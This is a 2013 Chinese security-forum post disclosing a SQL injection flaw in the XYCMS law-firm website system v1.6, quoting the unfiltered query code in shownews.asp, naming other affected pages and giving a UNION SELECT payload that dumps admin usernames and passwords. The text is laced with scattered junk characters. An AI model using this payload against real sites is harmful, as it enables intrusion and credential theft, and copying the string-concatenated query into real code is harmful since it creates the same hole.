中国网络渗透测试联盟

标题: XYCMS律师事务所建站系统注入漏洞 [打印本页]

作者: admin    时间: 2013-4-4 17:28
标题: XYCMS律师事务所建站系统注入漏洞
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
, ^9 e9 m! M6 q' H" D: N% [ & K! P- T  A! }7 C; ^
淫荡分割线
& h7 z8 t4 l! N" I$ c% K! i1 B* L--------------------------------------------------------6 U) C9 V1 e7 R# E( Z

6 B7 E0 U' f% @* Q! b0 }审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测). g( |; m3 Z( F6 s# ?
源码地址:http://down.chinaz.com/soft/29233.htm+ d) C( c# R! i2 `

! K9 x3 N2 D, D: a4 F漏洞文件:shownews.asp! c! @. e, M% C) l: {
漏洞代码:7-13行
1 Y% L' a3 C1 q0 x. O& g: B 8 b' t' e1 D* g( Q: \9 {4 `( t

/ F& n7 v+ W# G! v) U$ i$ `+ w! c/ Y<% 2 W; y9 ]/ |) {* ^& `& n  [. `
id=request.QueryString("id")3 F& r# Q' ^* l
   
, ~  I' k3 m6 j/ d# j6 gset snews=server.createobject("adodb.recordset") $ {8 W& i3 l9 J( g: H% |0 j1 x
exec="select * from [news] where id="&id: o# Z5 K/ f% F, O9 V3 [: z% `
snews.open exec,conn,1,1
5 y+ d1 {/ u5 h' o/ u  }2 L%>
$ E; I7 N- v% b) v 3 e7 g( n! F) V+ f% k4 e
* K) m& Y  {; ?9 R3 B  t" I
什么过滤都没有  直造成注入
3 W) M# r7 `6 U5 R+ N8 Y
) t: K' X7 T: J0 k$ t3 w注入点:http://127.0.0.1:99/shownews.asp?id=xx
/ C+ O# O3 V7 I# t, g5 `7 |8 N   ~" }% u1 A* a. o) _3 N2 X
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找) x% R8 f7 @" C0 M

6 c* O) Z( U) {+ o* I6 c& |
" R4 G2 o) F* L7 c8 ?exp: union select 1,admin,password,4,5,7 from admin_user0 G* w/ f8 c& }* ~: @4 f9 q

  C$ ^, A: ?; e




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2